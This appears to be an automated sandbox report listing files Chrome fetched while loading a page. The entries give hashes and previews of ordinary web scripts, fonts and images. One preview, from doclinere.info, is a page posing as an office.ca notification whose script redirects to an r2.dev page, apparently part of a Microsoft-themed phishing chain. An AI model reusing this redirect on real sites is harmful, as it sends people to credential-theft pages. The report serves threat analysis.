                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (55551)
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):55680
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.203995243517671
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:Umnx/qB6uktwNUsQ34PWsthj1tdp+YpsZo+T5vXF8+8BcEcvXQdiIorZMYdwje2W:Uj04P7xmFtebJOYy7zAOVBYG
                                                                                                                                                                                                                                                                                                                                                                                        MD5:C8685D60E0F44F53F4A24D3C2B3F3DF0
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:31108C0976B00B468EA1DE91922304FEBF805258
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1DBF4A2619AD865A2BD677CA5F72B04141D33349241188E7815876C338414D70
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1635D984A85D73CCB11A1C4FC921F3AEFC2522BB096511DB6CD2C603EC5A9F6691BA12AEE5AE3FE6EF388E76930D01CB533EEA8296752682779D3556445F822D
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! @sentry/browser 7.19.0 (1818483) | https://github.com/getsentry/sentry-javascript */.var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return h(t,Error)}}function r(t,e){return n.call(t)===`[object ${e}]`}function i(t){return r(t,"ErrorEvent")}function s(t){return r(t,"DOMError")}function o(t){return r(t,"String")}function c(t){return null===t||"object"!=typeof t&&"function"!=typeof t}function u(t){return r(t,"Object")}function a(t){return"undefined"!=typeof Event&&h(t,Event)}function f(t){return Boolean(t&&t.then&&"function"==typeof t.then)}function h(t,n){try{return t instanceof n}catch(t){return!1}}function l(t){return t&&t.Math==Math?t:void 0}const d="object"==typeof globalThis&&l(globalThis)||"object"==typeof window&&l(window)||"object"==typeof self&&l(self)||"object"==typeof global&&l(global)||function(){return this}()||{};function p(){return d}fun
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1864
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.222032823730197
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                                                                                                                                                                                                                                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):8406
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.974310133722056
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:gMR441csfBgjDGzJxbGnnq3lVfp2JNyj1dA+EyrIlnvFnDlReYXKwMfqpeUoEbw9:W41ciqIx+nEVBsF+RMFxrBMfqQUpg5NB
                                                                                                                                                                                                                                                                                                                                                                                        MD5:7C1B5652EAE8DD0C5D6DD8FC5307A07A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5915160A7A89DBA021CEF95C41BEEC1118D78BD2
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:52B28E81FCD90CE1A8E69BC9B563EC18B095E5E2F3ACC7C15B35C09559A91699
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E83CE11259270B14D94CB2929C155690232B991BC30D5B733942875B867EB6C6FF127C1C392341B9DBEE7FEA871C2F5702C223B21594D26E730A603757084A4E
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://imgv2-1-f.scribdassets.com/img/word_document/263504218/149x198/5791495c90/1733362199?v=1
                                                                                                                                                                                                                                                                                                                                                                                        Preview:RIFF. ..WEBPVP8 . ...r...*....>m,.F$"!./.....@...O..._b.#.8.........?..W{q.u=C.....M..>.......e./.{.......|.{O.....YK....s.....w......?.xs....P..............{.......x...........?................|..4...[........?......%.g...?.........?......LG....=u.A.F.....e2..Q.....kP....8w...<.l....Z......[...Y.Y}...=.jg..GO.....o*...I2po.....{......"$.T<.o.............!..M<.....m......_...j..K.O..?W..gb.P..Us.|.....|...^..f....T..;.*R(...J_z..T.]'.r.m..<Ko.a.1..I=.M ....,...u..".U.Y...xUm.%.A...`. .....XHE.1...^a.|.F.#&6{..N.\.VL}Y..O.g...x.... .G.!.."!lN.d..a.?.s..2.a5.Kj...>._ex..G.....z.].4..!...C..#....@]..X...&...i....?.........g..-..!.-D..........iER....HV(,!.~.8d....D`.8m...0...N;tK.....}j...J.Cg...N..9.1.......g...9..F../O..%....lFza.Q.40.......&?...z6.3t..^. ..eT..m.(...xm..<s.q.&..V^.l.....{..B.1!......... 7.,.^@b.!.|....nm..0#{H..`...[.....P.{S.u...-....{.p+0.?..}%AZ$.....l...A..w.H.b...10B..>`..3...;%.....BNtjM.M+)..G^.3...t....:.NGx=..o..n.
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):364
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.561528284615616
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:2LGa3ymyCE//MzGCFiM1wBJPwcQK5DrIt6xfeGYqX3OLGhw47Jsr4z+LibIEBE7L:2f3ymyCEIiMRhykgIaOEsrq1EiE7yyyu
                                                                                                                                                                                                                                                                                                                                                                                        MD5:45100DDBE4FB816CA7BA9F16F494964A
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B7A62A6E65E6CBF915B895CE14952250387295D9
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CCE2184EC089BABC70DED47B8474C543F6A5FF013E4BFD9DBAE8689489BB13BA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:08D730DB7FF2E5EE9BEF496CAC3341ECDEC96D579FD034087813FC9CBC87008824EE9577409BCB6002815FD441A7A05EF1B860A6340E59AFEF5181CB2665D674
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://bat.bing.com/p/action/15260218.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:(function(w,d,c,k,a,b,t,e) {. var cs = d.currentScript;. if (cs) {. var uo = cs.getAttribute('data-ueto');. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {. w[uo].setUserSignals({'ea': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});. }. }.})(window, document, false, false, false, false, false, false);..
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 904x639, components 3
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):10380
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.365791494353226
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:EzCxjOxVUtF+CG9QjaXQjbje0QyTGMGicQVqGA9wDp0:EZ8uQuobaoGiToh
                                                                                                                                                                                                                                                                                                                                                                                        MD5:5E647DB2E2CE5B17AF711B7B03FB18B1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1A57E3C5DFBED152293E382877167FCDAB32A065
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6D2ECA85DFB353C15CC09A082FAEC512FB2E84BC745D4746844A544A5B876FD8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9F584739B7BFC5FDD9128FFE32B2DFBD3BF3F282D7EE15567C432A3FF9B928F8FE1B155C58EE17273A34E209BF2515E72891CB34DDE5B3D77179618CDC8166B1
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C......................- " " -D*2**2*D<I;7;I<lUKKUl}ici}.............C......................- " " -D*2**2*D<I;7;I<lUKKUl}ici}.....................".......................................@.........................!15t..AQ...."STaq...Rs.....#24B.$b.r................................2.......................2q...!Q1AR."a...#3..45B..............?..u.l.........@.Q.........E..............m}................%.....uW...%...................
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (950)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1211
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.349776830336402
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24:DP9wSFGLnxbFGWzz6u1JJSa7oRW7aRWXCunouOvTMOKFId6J39Mb:5xGLrGW7STw2wptI8Id6y
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9A1CD61485389D6A4C695E85DE7F06E7
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:90E4F020D5614A61A7874E96D2300E63B466538B
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4472725A7FF20CBDF7B518FCF45E653B636DEF8857A62018A2403CBAA2F2D6EB
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:999B368B447DFAC73E0456F08D16A49CE83E2F0AFBEF3A5F33F99D68C3F806F71AB64A9E3CD2C159D2AD61F52B8B0AA438D980D65F0835D75637C4176B526F25
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://doclinere.info/vn/re.htm
                                                                                                                                                                                                                                                                                                                                                                                        Preview:<head> . <title>Detail notification for www.office.ca</title> . </head> . <body> . <SCRIPT LANGUAGE="JavaScript"> . . self.location = 'https://pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev/dri.html'; . //--> . </SCRIPT> . <script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8edf8b966e6441bd',t:'MTczMzUyMjM5MC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoa
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3772)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):3851
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.200573441851524
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:48:iItFDCDW7/DZWAabuxjOj2YLkMHOoDCmvVIlx+t2ZcbuxjOj2Y4jzHmyakIvnAc:5V+KiPj9Lk5U7vVQQ2ZcPj94I5
                                                                                                                                                                                                                                                                                                                                                                                        MD5:A2AAC2A66975C49CFA2B8D1A978DA0E6
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:21FD0221C2531AB5FC932712F6FAFAE938CDCFD8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B5C677CEFC970F1D9A183097D0F4502121A8DC9F0E451E81644ED0A239DBCE90
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:19E065821D4246387F64956D4B20E53059EF5703474F1EF7FB460DE29DAE98DE5A984FD2BDE81E38353098A07A66EF69FBF9D3E13EFD93703CC7E15D340A97F7
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/doc_page/214.b28244.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[214],{92214:(e,t,r)=>{r.r(t),r.d(t,{default:()=>b});var n=r(96540),a=r(38544),i=r(40880),o=r(37594),l=r(77434);function s({hide_modal:e}){const t=(0,a.d4)((e=>e.wordDocument.extracted_title)),r=(0,a.d4)((e=>e.wordDocument.description)),s=(0,a.d4)((e=>e.wordDocument.generatedDescription));return n.createElement(n.Fragment,null,n.createElement(o.OA,{onCloseClick:e},t?i.A.t("webpack.doc_page.src.App.Page.modals.Description.Description.document_information"):i.A.t("doc_page.description_modal.description")),n.createElement(o.Iu,null,n.createElement("div",null,null!==s&&void 0!==s?s:r),n.createElement(l.K,null)))}var c=r(35096),d=r(75875),p=r(58115),u=r(60309),m=r(25983),g=r(70996),_=r(51336);function f(e,t,r){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw n
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:gzip compressed data, was "s.js_.gstmp", last modified: Thu Nov 14 17:34:44 2024, max compression, original size modulo 2^32 78992
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):26602
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.992300527861587
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:fl13xj429FB+rcDCTWo5sYIb76Q0F+dtSO4vjGt0lSK+xe+Ksow1/4e/9ST8y0:flbR+JsYICQ0F+SO4vjGGUbN0w1/z/9N
                                                                                                                                                                                                                                                                                                                                                                                        MD5:7D757D5340E56BB7A1ED7CAD7F2E709B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:28835264E7B827D4C5A1D05256495350E616545D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D96AE14106A03E4E3123F4DA7F69FAA97BF5A5D038A34E7A015A9891FE6C6F66
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:50656F1F24BE947F552CEC572505FE55E20672ECDD09D1D80DCE249321D3931BFA783186645B898CB5C283B71E5123DFED4F313B487146EC55D4AEDFA8AB384B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://cdn.siftscience.com/s.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.....46g..s.js_.gstmp..ic.H. .}~...........A.Y..<c...U.4... ...X8tX.....y ....g..v.D ..D.qeD......z.z.O.b.d.I2.Z.4Y8.|.>,..5..<_f...<..+k.,....~o..z.N.8..."..i+..Z..?.t..u...d.%."..V..."V#.[.y..X..../Ot.}T...".I..Z.....2.#..`.A......a.Q.?.pr.)\..W..].>^'..;.6h...........>...s>..m.F..:o...u6M.......?./6f...2....,L..<.........2h%.W.~....}....t.E.............,.'7.tu..h..,.......~.?.N.:0k.4...w.E8...'.;_.[?...2..u.........Ag.,|h!..A'...N...\i.*.z.....AmE.......d...0.f=Z...!.y.'F......Kb?k........5J..E...h..?lA.A..1<da....[.d...M.<J.....aW4.KeDjoy..{...bG..._vfEL.\7..".ZY...\so...x.6........Hf.y.\...0...NS.;.3C..l...4..h6.?.....m.z`<.A^.q+..../_..2........[.Z.I. ..v....}.c....."=05h./.\3....`...{...2I..Z].X.fj&.d.._...W+=.l3.xIO..x.......H..p.o...].k1<...`+)..m.vw.ZQyo.VN..n....H5.pw..>`..o|.Hc@n.p...x.M..h..e...c...E....r4c=...5.....SV4.pH.5..y....x...Y....H..i.g.qp...6f.w....n..;V...JJP^<.....}`X........Q..:M.Z...4MR]{.#.i..h-h...).i+N..U.*.W@.|...I..-
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65468)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):271449
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.45467752444852
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3072:dqiC9656lo43c1zxB1DorwmN5/98VTaFeYnUMMDLbSzLbKSVLrOcQXL2:dqiC965W8B1Dorwy/OVT/naLVfQXL2
                                                                                                                                                                                                                                                                                                                                                                                        MD5:41A5C0C320EE8AF9B0561C118B6FB549
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FD2C606BF50B546476AD623BA9544102A07156C8
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:C7734920393EEAA21CB3B9D3ABE03BE05FFD41FF9CFA3200D0C6AFACB9559B42
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:62FBE8BFDD11992EA311067E0EF79E48655F86C64F28F9E683B6F32D727AED73F4151D5C7E21F5C779D250D6E6FA457608C1360A9316826D25787B374B1DE3D5
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://cdn.optimizely.com/js/24721610109.js
                                                                                                                                                                                                                                                                                                                                                                                        Preview:/*! For license information please see client.min.js.LICENSE.txt */.(function(){var __webpack_modules__={7584:function(n,t,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendor",h="version",p="architecture",g="console",m="mobile",_="tablet",w="smarttv",y="wearable",b="embedded",E="Amazon",I="Apple",A="ASUS",S="BlackBerry",T="Firefox",R="Google",k="Huawei",N="LG",D="Microsoft",C="Motorola",O="Opera",x="Samsung",P="Sharp",M="Sony",L="Xiaomi",V="Zebra",F="Facebook",U=function(n){for(var t={},e=0;e<n.length;e++)t[n[e].toUpperCase()]=n[e];return t},z=function(n,t){return typeof n===s&&-1!==j(t).indexOf(j(n))},j=function(n){return n.toLowerCase()},G=function(n,t){if(typeof n===s)return n=n.replace(/^\s\s*/,""),typeof t===u?n:n.substring(0,350)},B=function(n,t){for(var e,i,r,u,s,f,l=0;l<t.length&&!s;){var d=t[l],v=t[l+1];for(e=i=0;e<d.length&&!s&&d[e];)if(s=d[e++].exec(n))for(r=0;r<v.length;r++)f=s[++i],typeof(u=v[r])==
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (18066)
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):448065
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.627514274496182
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:X4e3ZcduK3zYqKEz+hbxpYRGPVNT4yzhWLml9RM:oeJo3Uq7g0yJY
                                                                                                                                                                                                                                                                                                                                                                                        MD5:BF761C4E4191C5FB017A5E71A31B1DED
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4F57C78A0D7F7B40301508182E73F35F7CF0CA65
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:24615AB1AFB54FE280B1415CC21F406E5648B8E90E2984F60CF29E10D7F6735E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:61E08FE2913901CD2BEAD0AD9E53409A8CD40427B95F6D37FB7984F93006A75F203123B619ECE74BD5C0DB5E229773ECE6507BDA1132F96931BF78AD8DB8B663
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-8KZ8BV0P5W&l=dataLayer&cx=c&gtm=45He4c40v78386455za200
                                                                                                                                                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":30,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":8},{"function":"__ogt_1p_data_v2","priority":30,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_l
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 15956, version 2.1376
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):15956
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.982889389608272
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:Zil9PN8l6QcRdNNIkJTjxIckqXGyB6wGk47FnySUrIHD8mT:0l9PN8oQcRdAkRjxa9wtmnjAK8S
                                                                                                                                                                                                                                                                                                                                                                                        MD5:9B771916B86A74A18A8BFC828256ABE1
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:B5CCD4B5A7BF0AD9D7C181881787C1261A14062E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B310F6CA0D12500D3D264AA9CC241256F55D65DBDB782485B5BD542D8FF97A8F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:ED6F6145D39B55D35B868BA1D76064B022E879868535482D0491ABCEA2D94FD7BB9C5C888DB435E8BD17CEDFB491CBBE527B2670EC6BF16733C5E7618148B168
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                        URL:https://s-f.scribdassets.com/webpack/assets/fonts/source_sans_pro/regular/source_sans_pro_regular.latin.e8ecbdac.woff2
                                                                                                                                                                                                                                                                                                                                                                                        Preview:wOF2......>T.......(..=....`.....................F..(.. .`....*..s.....0..v.6.$.....J.. ..r. .V...%......X..L.... T...=.........."..j...P4...Q].....N.[...U.$..X;.n,$?\73.fjn...T...]v.Qh.|5...4;A...eg...JA..6Yl.d.t......#*.j...3.m.Or.....Y.....I5.T..H.22N...?..z......of.Z.1.JJl...00..........,.cE...6VQf..Xu...6v.\a.X..6O.......F'....A.c.>.q.........p[..r.Kv.A..1...B...Qb...p.......P.......r..op'.....}H....P.....:dE $.'L}}....L8;u.X..T...../eM..R....I.x../...8..,...8.........[z..kD}..a...NC2w........$}.;.......Q.e..:$..H+\.Ld."..U"..(...^?...^.(......lV........7.ViM....2.....n.4.....#...{I....43Z.........9Z~ ..0......$...rG.}j.2...3ku....`..`.X......|.+.2..%.e...D.B.j.h.;*...r...?..`bc8=....s...?.5...i......q.V_}S.......C..1.!x.q....~F......".D.b..[...{X{EAEfH.A....}.$E(7b...a#.E...0"%..e.b.=........D.g;.h>u.%..Y......]v..D@.]..4.)......u....jX....y....{+.t6.V.wG...5..6!*"~......xQ..:...W!.'..+D....... ...w_.J.....o.....a.....#..r......fHX...X
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 149x198, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4650
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.956451844324958
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:96:MHFwEHMeadqxKhWhZrP739bhGUxYmySajdaFLpEC8t1gykgWD9p+6MYY3Rp:MpMeRkhcz39bH9ySMaFIt1YQBp
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2123870BE72D2775122EF54F4A41298F
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0EEB416A80C818664E0A9725C2C2559BEFD6D1A6
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:488001A0D4FE1704E09CDCB493922F335CAD18F5C9777DAAB53BD579605B19A5
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7083059C072165F16270666B569EADEC0B6611F36A04AFB2D62FCBA30D6043118F74673A127E8E3514588CDA302C9DC9573AF7D9C5082EC450214FA379D0D8A8
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                        Reputation:low
